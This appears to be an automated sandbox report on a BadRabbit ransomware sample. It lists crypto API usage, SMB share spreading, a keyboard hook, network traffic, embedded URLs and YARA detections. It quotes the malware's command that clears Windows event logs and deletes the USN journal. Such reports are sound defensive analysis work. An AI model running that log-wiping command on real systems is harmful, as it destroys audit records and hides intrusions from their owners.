          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF5780 CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,3_2_04BF5780
          Source: C:\Windows\dispci.exeCode function: 32_2_00A842A0 VirtualAlloc,VirtualLock,GetCurrentThreadId,GetCurrentThreadId,SetWindowsHookExW,SetWindowsHookExW,GetCurrentThreadId,SetWindowsHookExW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,32_2_00A842A0
          Source: C:\Windows\dispci.exeCode function: 32_2_00A81080 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,32_2_00A81080
          Source: C:\Windows\dispci.exeCode function: 32_2_00A81000 CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,32_2_00A81000
          Source: C:\Windows\dispci.exeCode function: 32_2_00A81810 CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,LocalFree,LocalFree,32_2_00A81810
          Source: C:\Windows\dispci.exeCode function: 32_2_00A815A0 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyKey,CryptReleaseContext,32_2_00A815A0
          Source: C:\Windows\dispci.exeCode function: 32_2_00A819F0 CryptDuplicateKey,CreateFileW,GetFileSizeEx,CreateFileMappingW,MapViewOfFile,CryptDecrypt,FlushViewOfFile,_wprintf,UnmapViewOfFile,CloseHandle,CloseHandle,CryptDestroyKey,SetEvent,SetEvent,SetEvent,32_2_00A819F0
          Source: C:\Windows\dispci.exeCode function: 32_2_00A81DF0 CryptCreateHash,CryptHashData,CryptGetHashParam,32_2_00A81DF0
          Source: C:\Windows\dispci.exeCode function: 32_2_00A81160 CryptEncrypt,CryptEncrypt,LocalAlloc,_memmove,CryptEncrypt,LocalFree,32_2_00A81160
          Source: C:\Windows\dispci.exeCode function: 32_2_00A81D70 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,32_2_00A81D70
          Source: C:\Windows\dispci.exeCode function: 32_2_00A812A0 CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,32_2_00A812A0
          Source: C:\Windows\dispci.exeCode function: 32_2_00A81220 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,32_2_00A81220
          Source: C:\Windows\dispci.exeCode function: 32_2_00A81E40 CreateEventW,CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,32_2_00A81E40
          Source: C:\Windows\dispci.exeCode function: 32_2_00A843B7 CryptReleaseContext,32_2_00A843B7
          Source: LisectAVT_2403002C_35.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: LisectAVT_2403002C_35.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: lsasrv.pdb source: D99F.tmp, 00000013.00000003.1281322886.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: lsasrv.pdbUGP source: D99F.tmp, 00000013.00000003.1281322886.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000003.00000003.1276657118.0000000003294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1254573454.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1324901443.000000000328A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1282329442.0000000003294000.00000004.00000020.00020000.00000000.sdmp, cscc.dat.3.dr

          Spreading

          barindex
          Contains functionality to enumerate network shares of other devices
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError, \\%s\admin$3_2_04BF9534
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF9B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$3_2_04BF9B63
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF5E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,3_2_04BF5E9F
          Source: C:\Windows\dispci.exeCode function: 32_2_00A81B80 PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,PathFindExtensionW,FindNextFileW,FindClose,32_2_00A81B80

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 445Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.98.116.138 445Jump to behavior
          Source: Joe Sandbox ViewASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
          Source: global trafficTCP traffic: 192.168.2.7:49674 -> 104.98.116.138:443
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF1EB9 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,htons,send,recv,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_04BF1EB9
          Source: global trafficDNS traffic detected: DNS query: time.windows.com
          Source: global trafficDNS traffic detected: DNS query: api.msn.com
          Source: rundll32.exe, 00000003.00000002.1324901443.00000000031FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/
          Source: rundll32.exe, 00000003.00000002.1324901443.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/8.
          Source: rundll32.exe, 00000003.00000002.1324901443.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1:80/
          Source: LisectAVT_2403002C_35.exe, cscc.dat.3.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: svchost.exe, 0000002A.00000002.2727131392.0000017215800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: rundll32.exe, 00000003.00000003.1276657118.0000000003294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1254573454.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1324901443.000000000328A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1282329442.0000000003294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp, cscc.dat.3.dr, dispci.exe.3.drString found in binary or memory: http://diskcryptor.net/
          Source: qmgr.db.42.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: qmgr.db.42.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.42.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: qmgr.db.42.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: qmgr.db.42.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: qmgr.db.42.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: edb.log.42.dr, qmgr.db.42.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: LisectAVT_2403002C_35.exe, cscc.dat.3.drString found in binary or memory: http://ocsp.thawte.com0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://rb.symcb.com/rb.crl0W
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://rb.symcb.com/rb.crt0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://rb.symcd.com0&
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://s.symcd.com0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://s.symcd.com06
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://sf.symcb.com/sf.crl0W
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://sf.symcd.com0&
          Source: regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.11.drString found in binary or memory: http://standards.iso.org/iso/19770/-2/2009/schema.xsd
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: LisectAVT_2403002C_35.exe, cscc.dat.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: LisectAVT_2403002C_35.exe, cscc.dat.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: LisectAVT_2403002C_35.exe, cscc.dat.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: svchost.exe, 00000007.00000002.1370159028.000002C81BE13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.comc
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: https://d.symcb.com/cps0%
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: https://d.symcb.com/rpa0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: https://d.symcb.com/rpa0.
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: https://d.symcb.com/rpa06
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
          Source: svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370617675.000002C81BE70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365044524.000002C81BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
          Source: svchost.exe, 00000007.00000002.1370571619.000002C81BE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364477715.000002C81BE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
          Source: svchost.exe, 00000007.00000002.1370673738.000002C81BE76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364010188.000002C81BE74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
          Source: svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365044524.000002C81BE5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
          Source: svchost.exe, 00000007.00000002.1370571619.000002C81BE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364477715.000002C81BE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
          Source: svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
          Source: svchost.exe, 00000007.00000002.1370344973.000002C81BE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
          Source: svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
          Source: svchost.exe, 00000007.00000003.1363950845.000002C81BE34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000007.00000002.1370344973.000002C81BE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000007.00000003.1365139160.000002C81BE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364865383.000002C81BE5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
          Source: svchost.exe, 00000007.00000003.1363950845.000002C81BE34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
          Source: svchost.exe, 00000007.00000002.1370571619.000002C81BE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364477715.000002C81BE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: qmgr.db.42.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
          Source: svchost.exe, 0000002A.00000003.1320828736.00000172154F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.dr, qmgr.db.42.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
          Source: qmgr.db.42.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
          Source: svchost.exe, 00000007.00000003.1365139160.000002C81BE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
          Source: svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000007.00000003.1364904828.000002C81BE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1363950845.000002C81BE34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Contains functionality to register a low level keyboard hook
          Source: C:\Windows\dispci.exeCode function: 32_2_00A842A0 SetWindowsHookExW 00000002,Function_00003FC0,00000000,0000000032_2_00A842A0
          Source: C:\Windows\dispci.exeCode function: 32_2_00A84070 GetDesktopWindow,GetForegroundWindow,GetShellWindow,GetCapture,GetClipboardOwner,GetOpenClipboardWindow,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetFocus,GetActiveWindow,GetKBCodePage,GetCursor,GetLastActivePopup,GetProcessHeap,GetQueueStatus,GetInputState,GetMessageTime,GetOEMCP,GetCursorInfo,GetCaretPos,GetCurrentThread,GetThreadTimes,GetCurrentProcess,GetCurrentProcess,GetProcessTimes,GetCurrentProcess,K32GetProcessMemoryInfo,QueryPerformanceCounter,GlobalMemoryStatusEx,EnumWindows,32_2_00A84070

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Yara detected Babuk Ransomware
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4828, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: dispci.exe PID: 7868, type: MEMORYSTR
          Yara detected TrojanRansom
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4828, type: MEMORYSTR
          Clears the journal log
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:Jump to behavior
          Clears the windows event log
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF15A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_04BF15A7

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: LisectAVT_2403002C_35.exe, type: SAMPLEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 0.2.LisectAVT_2403002C_35.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 3.3.rundll32.exe.32943b8.2.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 3.3.rundll32.exe.32943b8.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 0.2.LisectAVT_2403002C_35.exe.ede2e0.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 19.0.D99F.tmp.7ff609750000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 Author: Florian Roth
          Source: 0.0.LisectAVT_2403002C_35.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 3.2.rundll32.exe.32943b8.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 3.3.rundll32.exe.32943b8.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 19.2.D99F.tmp.7ff609750000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 Author: Florian Roth
          Source: 32.2.dispci.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: 32.2.dispci.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 32.0.dispci.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: 32.0.dispci.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 3.3.rundll32.exe.32943b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 3.2.rundll32.exe.32943b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 3.3.rundll32.exe.32943b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 3.3.rundll32.exe.32943b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 3.2.rundll32.exe.3216810.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 3.2.rundll32.exe.3216810.1.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 3.2.rundll32.exe.3216810.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit Payload Author: kevoreilly
          Source: 3.2.rundll32.exe.4bf0000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 3.2.rundll32.exe.4bf0000.2.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 3.2.rundll32.exe.4bf0000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit Payload Author: kevoreilly
          Source: 3.2.rundll32.exe.3216810.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 3.2.rundll32.exe.3216810.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
